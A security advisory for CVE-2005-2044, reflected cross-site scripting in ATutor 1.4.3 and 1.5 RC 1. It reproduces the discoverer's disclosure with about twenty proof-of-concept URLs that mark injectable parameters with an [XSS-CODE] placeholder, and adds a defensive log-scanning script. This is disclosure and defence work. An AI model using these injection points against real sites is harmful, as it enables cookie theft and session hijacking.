ATutor Input Validation Bugs in Several Scripts Permit Cross-Site Scripting Attacks

SecurityTracker Alert ID: 1014216
SecurityTracker URL: http://securitytracker.com/id?1014216
CVE Reference: CVE-2005-2044
Updated: Jul 17 2008
Original Entry Date: Jun 16 2005
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 1.4.3, 1.5 RC 1
Description: Lostmon reported a vulnerability in ATutor. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ATutor software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:
http://[target]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
http://[target]/ATutor/contact.php?subject=[XSS-CODE]
http://[target]/atutor/content.php?cid=323[XSS-CODE]
http://[target]/atutor/inbox/send_message.php?l=1[XSS-CODE]
http://[target]/atutor/search.php?search=10[XSS-CODE]&words=kk&include=all&find_in=this&display_as=pages&search=Search
http://[target]/ATutor/search.php?search=1&words=aa[XSS-CODE]&include=one&find_in=all&display_as=summaries&search=Search#search_results
http://[target]/ATutor/search.php?search=1&words=aa&include=one[XSS-CODE]&find_in=all&display_as=summaries&search=Search#search_results
http://[target]/ATutor/search.php?search=1&words=aa&include=one&find_in=all[XSS-CODE]&display_as=summaries&search=Search#search_results
http://[target]/ATutor/search.php?search=1&words=aa&include=one&find_in=all&display_as=[XSS-CODE]summaries&search=Search#search_results
http://[target]/ATutor/search.php?search=1&words=aa&include=one&find_in=all&display_as=summaries&search=[XSS-CODE]Search#search_results
http://[target]/ATutor/inbox/index.php?view=1[XSS-CODE]
http://[target]/ATutor/tile.php?query=yy&field=technicalFormat&submit=Search[XSS-CODE]
http://[target]/ATutor/tile.php?query=[XSS-CODE]&field=technicalFormat&submit=Search
http://[target]/ATutor/tile.php?query=yy&field=technicalFormat[XSS-CODE]&submit=Search
http://[target]/ATutor/forum/subscribe_forum.php?fid=2&us=1[XSS-CODE]
http://[target]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
http://[target]/ATutor/directory.php?roles%5B%5D=1&status=2&reset_filter=Reset+Filter[XSS-CODE]
http://[target]/ATutor/directory.php?roles[]=1[XSS-CODE]

Some of the exploit URLs require that the target user be authenticated to the system.

The vendor was notified on June 14, 2005.
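
An added example (not part of the SecurityTracker entry or of Lostmon's advisory): with no vendor fix available at the time of the entry, one way to review web-server access logs for requests that put unexpected content into the script and parameter pairs listed above. The script-to-parameter map is taken from the demonstration URLs; the integer-only parameter set, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters that carry [XSS-CODE] in the advisory's demonstration URLs.
WATCHED = {
    "browse.php": {"show_course"},
    "contact.php": {"subject"},
    "content.php": {"cid"},
    "inbox/send_message.php": {"l"},
    "inbox/index.php": {"view"},
    "search.php": {"search", "words", "include", "find_in", "display_as"},
    "tile.php": {"query", "field", "submit"},
    "forum/subscribe_forum.php": {"us"},
    "directory.php": {"roles[]", "status", "submit", "reset_filter"},
}
# Assumption: these hold integers, as in the advisory's URLs (cid=323, status=1).
NUMERIC = {"show_course", "cid", "l", "view", "us", "roles[]", "status"}
MARKUP = re.compile(r'[<>"]')  # characters that can break out of HTML text or attributes
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return (script, parameter) pairs in one request target that need review."""
    parts = urlsplit(target)
    path = parts.path.lower()  # the advisory mixes /ATutor/ and /atutor/
    hits = []
    for script, params in WATCHED.items():
        if path.endswith("/" + script):
            # parse_qsl percent-decodes names and values: roles%5B%5D becomes roles[]
            for name, value in parse_qsl(parts.query, keep_blank_values=True):
                bad = MARKUP.search(value) or (name in NUMERIC and not value.isdigit())
                if name in params and bad:
                    hits.append((script, name))
    return hits

# Returns (line number, script, parameter) for each flagged request in a log.
def scan(lines):
    return [(n, script, name)
            for n, line in enumerate(lines, 1)
            for m in [REQUEST.search(line)] if m
            for script, name in suspicious_params(m.group(1))]

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jun/2005:10:00:01 +0200] "GET /ATutor/content.php?cid=323 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [16/Jun/2005:10:00:07 +0200] "GET /atutor/content.php?cid=323%3Ci%3Ex%3C%2Fi%3E HTTP/1.1" 200 5188',
    '192.0.2.12 - - [16/Jun/2005:10:00:09 +0200] "GET /ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&status=1%22%3E&submit=Filter HTTP/1.1" 200 8040',
    '192.0.2.13 - - [16/Jun/2005:10:00:12 +0200] "GET /ATutor/inbox/index.php?view=1abc HTTP/1.1" 200 3310',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The advisory notes that other scripts and variables are affected in the same way, so the map covers only the pairs it names and a clean result does not rule out the issue elsewhere.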

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ATutor software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Vendor URL: www.atutor.ca/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Lostmon <lostmon@gmail.com>
Message History: None.

Source Message Contents

Date: Thu, 16 Jun 2005 04:37:12 +0200
From: Lostmon <lostmon@gmail.com>
Subject: ATutor multiple variable Cross site scripting
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORY: http://lostmon.blogspot.com/2005/06/atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
################################################
ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.
ATutor contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
###########
versions:
###########
ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
#############
solution
#############
no solution was available at this time
##############
timeline
##############
discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
disclosure: 16-06-2005
##################
Proof of concepts
##################
http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]
http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]
http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]
http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search
http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results
http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search
http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search
http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]
To exploit some of the flaws, a client login is needed.
Other scripts and other variables are vulnerable
to the same style of attack.
############### €nd ##############
Thanks to estrella for being my light
-- sincerely: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/
-- Curiosity is what makes the mind move....